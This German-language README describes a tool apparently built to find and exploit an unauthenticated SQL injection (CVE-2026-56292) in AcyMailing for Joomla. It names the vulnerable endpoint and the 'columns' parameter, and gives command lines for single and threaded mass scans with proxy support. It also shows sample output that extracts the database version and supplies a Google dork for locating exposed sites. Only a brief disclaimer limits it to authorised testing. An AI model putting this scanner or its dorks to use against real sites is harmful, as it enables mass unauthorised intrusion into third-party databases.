
CVE-2026-56292 - AcyMailing für Joomla - Scanner für nicht authentifizierte SQL-Injection
Autor: nullwhisper
Nur für autorisierte Sicherheitsforschung / Schwachstellenvalidierung.
AcyMailing for Joomla stellt die öffentliche Frontend-Aufgabe frontentityselect::loadEntityFront bereit. In älteren Versionen wird der Parameter columns ohne Bereinigung direkt in eine SQL-Abfrage übergeben. Gepatchte Versionen verwenden acym_secureDBColumn() und geben einen Fehler wie ... not secured zurück.
index.php?option=com_acym&ctrl=frontentityselect&task=loadEntityFrontcolumns.
├── cve_2026_56292_acymailing_sqli.py # single + mass scanner
├── dorks.txt # google dorks
├── TECHNICAL.md # technical write-up
├── requirements.txt
├── LICENSE
└── README.md
pip3 install -r requirements.txt
Einzelnes Ziel:
python3 cve_2026_56292_acymailing_sqli.py -u http://target/
Massen-Scan:
python3 cve_2026_56292_acymailing_sqli.py -l targets.txt -v -T 30 -o vuln.txt
Optionen:
-u URL single target
-l LIST target list file
-t TIMEOUT request timeout (default 30)
-T THREADS concurrent threads (default 10)
-o OUTPUT output file for vulnerable targets
-v verbose
--proxy PROXY http/https proxy
--patched-output FILE
--error-output FILE
Getestet gegen eine AcyMailing-v11.0.3-Installation in einem lokalen Joomla-5-Labor (verwundbarer Simulationsmodus).
[*] Loaded 1 unique target(s)
[1/1] [+] VULNERABLE: http://127.0.0.1:8080/ -> version=10.11.18-MariaDB-ubu2204
[*] Done. Vulnerable: 1 | Patched: 0 | Error/Other: 0 | Total: 1
Siehe dorks.txt. Primärer Dork:
inurl:"index.php?option=com_acym"
Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und Forschung bestimmt. Verwenden Sie es nicht gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche schriftliche Erlaubnis zum Testen haben. Der Autor (nullwhisper) übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch diesen Code verursacht werden.
MIT — siehe LICENSE.